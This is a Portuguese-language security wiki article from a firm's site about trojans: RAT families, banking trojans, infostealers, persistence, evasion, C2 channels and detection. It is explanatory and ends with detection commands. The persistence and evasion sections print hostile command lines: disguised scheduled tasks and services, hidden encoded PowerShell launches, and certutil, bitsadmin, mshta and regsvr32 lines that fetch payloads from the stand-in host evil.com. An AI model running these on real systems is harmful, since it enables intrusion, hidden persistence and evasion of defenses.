// INICIALIZANDO SISTEMA...
Falar no WhatsApp

Utilizamos cookies essenciais para o funcionamento do site. Ao continuar, você concorda com nossa Política de Privacidade e com a LGPD.

CyberZ
Fale Conosco
CyberWiki / Malware & Ransomware / Trojans — Cavalos de Troia
● Intermediário 22 min de leitura Trojan RAT Backdoor C2 Keylogger Injeção Evasão APT

Trojans — Cavalos de Troia

Trojans são malwares que se disfarçam de software legítimo para enganar o usuário. RATs (Remote Access Trojans) são a categoria mais perigosa — dão controle total do sistema ao atacante. São a ferramenta preferida de grupos APT para espionagem e persistência.

Tipos de Trojans

RAT — Remote Access Trojan

Controle total do sistema infectado: shell remota, upload/download de arquivos, keylogging, captura de tela, acesso à câmera e microfone.

RATs conhecidos (usados em ataques reais):

Cobalt Strike Beacon
  - Ferramenta comercial de red team, vastamente pirata
  - C2 via HTTP/HTTPS/DNS
  - Malleable C2 profiles para parecer tráfego legítimo
  - Pivoting, process injection, credential harvesting integrados

Sliver (open source, C2 moderno)
  - Substituto open source do Cobalt Strike
  - Implants em Go: Windows, Linux, macOS
  - mTLS, HTTP/S, DNS beaconing

DarkComet
  - RAT antigo, amplamente usado em espionagem
  - Keylogger, screenshot, webcam

NjRAT
  - Muito prevalente no Oriente Médio
  - Funcionalidades básicas de RAT em .NET

AsyncRAT
  - Open source, .NET, criptografia AES-256
  - Muito usado por script kiddies após vazamento do código

Quasar RAT
  - Open source, usado por APTs (APT10, APT33)
  - Features completas: RDP remoto, file manager, system info

Banking Trojan

Objetivo: roubar credenciais bancárias

Técnicas:
- Web Injection: modifica páginas de banco no browser da vítima
- Man-in-the-Browser: intercepta formulários antes da criptografia SSL
- Form Grabbing: captura dados antes de enviar (Stealer)

Exemplos:
Emotet      - distribuição de malware + banking (desativado em 2021, voltou)
TrickBot    - banking + credential harvesting + spreader
Dridex      - banking sofisticado, entregue via macros em Word
Zeus/ISFB   - código-base de muitos bankers modernos

Infostealer / Stealer

Objetivo: roubar credenciais salvas, cookies, carteiras crypto

RedLine Stealer:
- Roubo de senhas de browsers (Chrome, Firefox, Edge)
- Cookies de sessão (bypass de 2FA)
- Carteiras de criptomoeda
- FTP credentials, VPN configs
- Screenshot e informações do sistema

Raccoon Stealer:
- Similar ao RedLine, MaaS (Malware-as-a-Service)
- Painel web para gerenciar vítimas

Vidar:
- Derivado do Arkei stealer
- Roubo de senhas, 2FA, carteiras

Logs de stealers são vendidos em mercados:
- Russian Market, Genesis Market (derrubado em 2023)
- 2easy Market
- Logs contêm: senhas, cookies, dados de autopreenchimento

Técnicas de Persistência

# Registro do Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

# Scheduled Tasks
schtasks /create /sc onlogon /tn "WindowsUpdate" /tr "C:\ProgramData\update.exe"

# Serviço Windows
sc create svchost binPath= "C:\Windows\System32\evil.exe" start= auto

# Startup folder
C:\Users\Usuario\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

# COM hijacking
# Modificar registro para redirecionar chamadas COM

# WMI Subscription
# Executar comando quando evento específico ocorre

# DLL Side-Loading
# Colocar DLL maliciosa com nome de DLL legítima
# Em diretório onde app legítimo a carrega primeiro

Técnicas de Evasão

-- Obfuscação de código
-- PowerShell encode:
powershell -EncodedCommand BASE64STRING
powershell -exec bypass -w hidden -enc BASE64STRING

-- Living off the Land (LOLBins)
-- Usar binários Windows legítimos para atividade maliciosa:
certutil.exe -urlcache -split -f http://evil.com/payload.exe payload.exe
bitsadmin.exe /transfer job /download /priority normal http://evil.com/payload.exe C:\evil.exe
mshta.exe http://evil.com/payload.hta
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

-- Injeção de processo (evasão de AV/EDR)
-- Process hollowing: criar processo suspenso, substituir código
-- Process injection: injetar shellcode em processo legítimo
-- DLL injection: carregar DLL maliciosa em processo legítimo
-- Thread hijacking: sequestrar thread de processo existente

-- Anti-análise
-- Verificar se está em sandbox/VM antes de executar
-- Verificar username (sandbox costuma usar nomes genéricos)
-- Verificar número de processos (sandbox tem poucos)
-- Sleep longo antes de malicious activity (evadir timeout de sandbox)

C2 — Command and Control

-- Protocolos de C2
HTTPS: mais comum, difícil de bloquear
DNS: muito furtivo (exfiltração via DNS queries)
HTTP via CDN: Cloudflare, Azure Front Door como proxy de C2
Slack/Discord/Telegram: C2 via API de serviços legítimos
GitHub: C2 via commits, issues ou gists
Dropbox/OneDrive: upload/download como canal C2

-- Domain Fronting
-- Usar CDN para ocultar IP real do servidor C2
-- Request vai para CDN legítimo (ex: Cloudflare)
-- SNI: host legítimo / Host header: servidor C2 real
-- Difícil de bloquear sem bloquear CDN inteiro

-- Fast Flux DNS
-- IP do C2 muda a cada poucos segundos
-- Dificulta blacklisting de IP

Detecção e Resposta

# Verificar conexões de rede suspeitas
netstat -anb  # conexões + processo (Windows)
ss -tlnp      # Linux

# Processos suspeitos
tasklist /v
ps aux | sort -k 3 -r  # Linux, por CPU

# Scheduled Tasks suspeitas
schtasks /query /fo LIST /v

# Startup entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Arquivos recentes em diretórios suspeitos
dir %APPDATA% /od /q
dir %TEMP% /od /q
ls -la /tmp/ ~/.local/

# IOCs em logs
# Autoruns (Sysinternals) — visualizar todos os pontos de persistência
# Process Monitor — rastrear atividade de processos
# Wireshark — capturar comunicação C2
Quer testar isso na prática?
A CyberZ realiza testes autorizados de segurança usando as técnicas descritas neste artigo — e muito mais. Identifique suas vulnerabilidades antes que os invasores o façam.
Falar com Especialista